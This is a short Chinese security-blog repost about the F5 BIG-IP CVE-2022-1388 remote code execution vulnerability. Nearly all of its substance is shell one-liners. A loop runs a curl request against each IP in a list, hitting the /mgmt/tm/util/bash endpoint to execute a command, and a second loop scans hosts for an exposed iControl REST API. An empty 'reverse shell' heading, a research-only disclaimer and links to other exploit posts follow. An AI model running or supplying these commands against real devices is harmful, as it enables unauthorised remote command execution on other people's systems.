F5 BIG-IP(CVE-2022-1388) RCE

2022年5月12日23:34:40评论44 views字数 356阅读1分11秒阅读模式

检测

cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done

cat ips.txt | while read host do; do curl -sk "https://$host/mgmt/shared/authn/login" | grep -q 'resterrorresponse' && printf "$host 331;41mF5 iControl REST API Exposede[0mn"; done

反弹shell

F5 BIG-IP(CVE-2022-1388) RCE

原文始发于微信公众号（关注安全技术）：F5 BIG-IP(CVE-2022-1388) RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

JeeWMS cgAutoListController.do SQL注入漏洞

泛微E-Cology9前台SQL注入漏洞

OpenSourceMatters Joomla 未授权SQL注入漏洞

某代理商管理系统存在RCE漏洞

OFCMS 1.1.2 存在任意文件写入漏洞

JeeWMS iconController.do 任意文件上传漏洞

利用 Windows 更新堆栈获取系统访问权限（CVE-2025-21204）附exploit

EnGenius路由器usbinteract.cgi接口存在远程命令漏洞附POC

Synology 网络文件系统漏洞允许读取任何文件

Cleo Harmony /Synchronization 任意文件读取漏洞

本文由 admin 发表于 2022年5月12日23:34:40
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
F5 BIG-IP(CVE-2022-1388) RCEhttps://cn-sec.com/archives/998002.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

目录

8888